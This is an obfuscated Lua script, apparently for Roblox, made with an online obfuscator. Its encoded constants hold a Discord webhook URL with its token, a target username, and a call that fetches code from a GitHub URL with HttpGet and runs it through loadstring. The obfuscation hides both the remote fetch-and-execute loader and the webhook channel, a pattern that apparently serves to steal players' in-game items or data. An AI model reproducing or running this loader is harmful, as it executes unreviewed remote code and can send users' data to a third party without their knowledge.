--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v102=v5(v85,v19);v19=nil;return v102;else return v85;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v86=0 -0 ;local v87;while true do if (v86==0) then v87=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-1) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v87-(v87%((1446 -(282 + 595)) -((2004 -(1523 + 114)) + 201))) ;end end else local v88=(929 -(214 + 641 + 72))^(v32-1) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==1) then return v35;end if (v34==(1065 -((185 -(32 + 85)) + 997))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=4 -3 ;end end end local function v22()local v36=0;local v37;local v38;while true do if (v36==((351 -(87 + 263)) + 0)) then return (v38 * (57 + 199)) + v37 ;end if (v36==(957 -(892 + 65))) then v37,v38=v1(v16,v18,v18 + (4 -2) );v18=v18 + ((183 -(67 + 113)) -1) ;v36=1 -0 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 4 ;return (v42 * (41190819 -24413603)) + (v41 * (48199 + 17337)) + (v40 * (1017 -761)) + v39 ;end local function v24()local v43=952 -(802 + 150) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(2 -(4 -3))) then v46=1 -0 ;v47=(v20(v45,1 + 0 ,1017 -(50 + 865 + 82) ) * ((5 -3)^(7 + 12 + 13))) + v44 ;v43=(887 -(261 + 624)) -(0 + 0) ;end if (v43==2) then v48=v20(v45,1208 -((3902 -2833) + 118) ,70 -(68 -29) );v49=((v20(v45,69 -37 )==1) and  -((1081 -(1020 + 60)) + (1423 -(630 + 793)))) or ((3 -2) -0) ;v43=3 + 0 ;end if (v43==(791 -((1227 -(814 + 45)) + 423))) then v44=v23();v45=v23();v43=3 -2 ;end if (v43==(21 -(10 + 8))) then if (v48==((0 -0) -0)) then if (v47==((2092 -1650) -(416 + 26))) then return v49 * (0 -0) ;else local v103=0 + 0 ;while true do if (v103==0) then v48=1 -0 ;v46=438 -(145 + 293) ;break;end end end elseif (v48==(2477 -(18 + 26 + 386))) then return ((v47==(1486 -(998 + 488))) and (v49 * ((1 + 0)/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(1795 -(201 + 571)) ) * (v46 + (v47/((1140 -(116 + (3518 -2496)))^52))) ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(766 -(745 + 21))) then return "";end end v51=v3(v16,v18,(v18 + v50) -((4809 -3061) -(760 + 987)) );v18=v18 + v50 ;local v52={};for v68=1914 -(1789 + 124) , #v51 do v52[v68]=v2(v1(v3(v51,v68,v68)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53~=(2 + 0)) then else local v92=0;while true do if (v92==(402 -(108 + 294))) then v58=nil;v59=nil;v92=1;end if (v92~=(1490 -(570 + 919))) then else v53=3;break;end end end if (v53~=(6 -2)) then else while true do if (v54~=(814 -(569 + 242))) then else v61=nil;while true do local v104=0;local v105;while true do if (v104==0) then v105=0 -0 ;while true do if (v105~=0) then else local v150=0 + 0 ;while true do if (1~=v150) then else v105=1;break;end if (v150==0) then local v157=1024 -(706 + 318) ;while true do if ((1251 -(721 + 530))~=v157) then else if (2~=v55) then else local v160=1271 -(945 + 326) ;local v161;local v162;while true do if (v160==(0 -0)) then v161=0;v162=nil;v160=1 + 0 ;end if (v160==1) then while true do if (0==v161) then v162=0;while true do local v172=0;while true do if (v172==(700 -(271 + 429))) then if (v162~=1) then else return v59;end if (v162==(0 + 0)) then local v174=0;local v175;while true do if (v174==0) then v175=1500 -(1408 + 92) ;while true do if (v175==(1086 -(461 + 625))) then for v180=1,v23() do local v181=0;local v182;local v183;local v184;while true do if (0~=v181) then else v182=1288 -(993 + 295) ;v183=nil;v181=1 + 0 ;end if (v181==1) then v184=nil;while true do if (1~=v182) then else while true do if (0~=v183) then else v184=v21();if (v20(v184,1,1172 -(418 + 753) )==(0 + 0)) then local v187=0 + 0 ;local v188;local v189;local v190;while true do if (v187==3) then if (v20(v189,3,1 + 2 )~=1) then else v190[2 + 2 ]=v61[v190[533 -(406 + 123) ]];end v56[v180]=v190;break;end if (v187==0) then local v192=1769 -(1749 + 20) ;while true do if (v192==1) then v187=1 + 0 ;break;end if (v192~=(1322 -(1249 + 73))) then else local v198=0 + 0 ;while true do if (v198~=(1146 -(466 + 679))) then else v192=1;break;end if (0~=v198) then else v188=v20(v184,4 -2 ,8 -5 );v189=v20(v184,4,6);v198=1901 -(106 + 1794) ;end end end end end if (v187==(1 + 0)) then local v193=0 + 0 ;local v194;while true do if (0==v193) then v194=0;while true do if (v194==(2 -1)) then v187=2;break;end if (v194==0) then local v200=0 -0 ;while true do if ((114 -(4 + 110))~=v200) then else v190={v22(),v22(),nil,nil};if (v188==(103 -(17 + 86))) then local v205=0 + 0 ;local v206;while true do if (v205==(0 -0)) then v206=0 -0 ;while true do if (v206~=0) then else v190[169 -(122 + 44) ]=v22();v190[4]=v22();break;end end break;end end elseif (v188==(1 -0)) then v190[3]=v23();elseif (v188==2) then v190[3]=v23() -((6 -4)^16) ;elseif (v188==3) then local v211=0 + 0 ;local v212;while true do if (v211==(0 + 0)) then v212=0;while true do if (v212~=0) then else v190[3]=v23() -((3 -1)^16) ;v190[4]=v22();break;end end break;end end end v200=66 -(30 + 35) ;end if (v200==(1 + 0)) then v194=1;break;end end end end break;end end end if (2==v187) then local v195=1257 -(1043 + 214) ;while true do if (v195==0) then local v199=0 -0 ;while true do if (v199==(1213 -(323 + 889))) then v195=1;break;end if (v199~=0) then else if (v20(v189,2 -1 ,1)~=(581 -(361 + 219))) then else v190[322 -(53 + 267) ]=v61[v190[1 + 1 ]];end if (v20(v189,415 -(15 + 398) ,2)~=(983 -(18 + 964))) then else v190[3]=v61[v190[3]];end v199=3 -2 ;end end end if (v195==(1 + 0)) then v187=2 + 1 ;break;end end end end end break;end end break;end if (0==v182) then v183=0;v184=nil;v182=851 -(20 + 830) ;end end break;end end end for v185=1 + 0 ,v23() do v57[v185-1 ]=v28();end v175=1;end if (v175~=1) then else v162=1;break;end end break;end end end break;end end end break;end end break;end end end if ((127 -(116 + 10))~=v55) then else local v163=0;while true do if (v163~=(0 + 0)) then else v60=v23();v61={};v163=1;end if (v163~=(739 -(542 + 196))) then else for v166=1 -0 ,v60 do local v167=0;local v168;local v169;local v170;local v171;while true do if (v167==(0 + 0)) then v168=0;v169=nil;v167=1 + 0 ;end if (v167~=2) then else while true do if (v168~=(1 + 0)) then else v171=nil;while true do if (1==v169) then if (v170==(2 -1)) then v171=v21()~=(0 -0) ;elseif (v170==(1553 -(1126 + 425))) then v171=v24();elseif (v170~=3) then else v171=v25();end v61[v166]=v171;break;end if (v169~=0) then else local v177=405 -(118 + 287) ;while true do if (v177==0) then local v178=0;local v179;while true do if (v178~=(0 -0)) then else v179=1121 -(118 + 1003) ;while true do if (v179==(2 -1)) then v177=1;break;end if (v179==(377 -(142 + 235))) then v170=v21();v171=nil;v179=4 -3 ;end end break;end end end if (v177~=1) then else v169=1 + 0 ;break;end end end end break;end if (v168==(977 -(553 + 424))) then local v173=0;while true do if (v173~=(1 -0)) then else v168=1;break;end if ((0 + 0)~=v173) then else v169=0;v170=nil;v173=1 + 0 ;end end end end break;end if (v167==1) then v170=nil;v171=nil;v167=2 + 0 ;end end end v59[3]=v21();v163=2;end if (v163~=2) then else v55=1 + 1 ;break;end end end v157=1 + 0 ;end if ((2 -1)~=v157) then else v150=1;break;end end end end end if ((2 -1)==v105) then if (v55~=0) then else local v154=0 -0 ;local v155;local v156;while true do if (v154~=0) then else v155=0;v156=nil;v154=1 + 0 ;end if (v154==1) then while true do if (v155==(0 -0)) then v156=753 -(239 + 514) ;while true do if (1==v156) then local v165=0 + 0 ;while true do if (v165~=0) then else v58={};v59={v56,v57,nil,v58};v165=1 + 0 ;end if (v165==(2 -1)) then v156=2;break;end end end if (v156~=(1202 -(373 + 829))) then else v56={};v57={};v156=732 -(476 + 255) ;end if ((1132 -(369 + 761))==v156) then v55=1;break;end end break;end end break;end end end break;end end break;end end end break;end if (v54~=(1 + 0)) then else local v98=0 -0 ;local v99;while true do if (v98==0) then v99=0;while true do if (v99~=1) then else v54=2;break;end if (v99~=(0 -0)) then else v57=nil;v58=nil;v99=239 -(64 + 174) ;end end break;end end end if ((0 + 0)==v54) then local v100=0 -0 ;while true do if ((337 -(144 + 192))==v100) then v54=1;break;end if ((216 -(42 + 174))~=v100) then else v55=0;v56=nil;v100=1;end end end if (v54~=2) then else local v101=0 + 0 ;while true do if (v101~=0) then else v59=nil;v60=nil;v101=1 + 0 ;end if (v101~=1) then else v54=3;break;end end end end break;end if (v53~=1) then else v56=nil;v57=nil;v53=1 + 1 ;end if ((1504 -(363 + 1141))==v53) then local v93=0;while true do if (v93==0) then v54=0;v55=nil;v93=1581 -(1183 + 397) ;end if (v93~=1) then else v53=2 -1 ;break;end end end if (v53~=(3 + 0)) then else v60=nil;v61=nil;v53=3 + 1 ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v89=0,v78 do if (v89>=v72) then v76[v89-v72 ]=v77[v89 + 1 ];else v80[v89]=v77[v89 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=9) then if (v83<=4) then if (v83<=1) then if (v83>0) then local v106=0;local v107;local v108;local v109;local v110;while true do if (v106==0) then v107=v82[2];v108,v109=v73(v80[v107](v13(v80,v107 + 1 ,v82[3])));v106=1;end if (v106==1) then v75=(v109 + v107) -1 ;v110=0;v106=2;end if (v106==2) then for v152=v107,v75 do local v153=0;while true do if (v153==0) then v110=v110 + 1 ;v80[v152]=v108[v110];break;end end end break;end end else v80[v82[2]]=v64[v82[3]];end elseif (v83<=2) then v80[v82[2]]=v82[3]~=0 ;elseif (v83>3) then local v130=v82[2];local v131=v80[v82[3]];v80[v130 + 1 ]=v131;v80[v130]=v131[v82[4]];else v64[v82[3]]=v80[v82[2]];end elseif (v83<=6) then if (v83==5) then do return;end else v80[v82[2]]();end elseif (v83<=7) then v80[v82[2]]=v82[3]~=0 ;elseif (v83>8) then v80[v82[2]][v82[3]]=v82[4];else do return;end end elseif (v83<=14) then if (v83<=11) then if (v83>10) then v80[v82[2]]();else v64[v82[3]]=v80[v82[2]];end elseif (v83<=12) then v80[v82[2]][v82[3]]=v82[4];elseif (v83==13) then local v139=v82[2];v80[v139]=v80[v139](v13(v80,v139 + 1 ,v75));else v80[v82[2]]=v64[v82[3]];end elseif (v83<=16) then if (v83>15) then v80[v82[2]]=v82[3];else local v121=v82[2];v80[v121]=v80[v121](v13(v80,v121 + 1 ,v75));end elseif (v83<=17) then local v123=v82[2];local v124,v125=v73(v80[v123](v13(v80,v123 + 1 ,v82[3])));v75=(v125 + v123) -1 ;local v126=0;for v127=v123,v75 do v126=v126 + 1 ;v80[v127]=v124[v126];end elseif (v83>18) then v80[v82[2]]=v82[3];else local v145=v82[2];local v146=v80[v82[3]];v80[v145 + 1 ]=v146;v80[v145]=v146[v82[4]];end v74=v74 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D65030C3O003670657465726B75746B613903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3133392O31353732363833383O343035332F547553396A765A794D7874695F784D6C346B5536664C584F6265325536312O516845364D4366716B33415851437555667A73477775507A2O386B65564A5F324C4579324303093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O0012103O00023O0012033O00013O0012103O00043O0012033O00033O0012103O00023O0012033O00053O00124O00063O00300C3O0007000800124O00063O00300C3O0009000800124O00063O00300C3O000A000800124O000B3O00122O0001000C3O00200400010001000D0012100003000E4O0002000400014O0011000100044O000F5O00022O000B3O000100012O00083O00017O00",v9(),...);
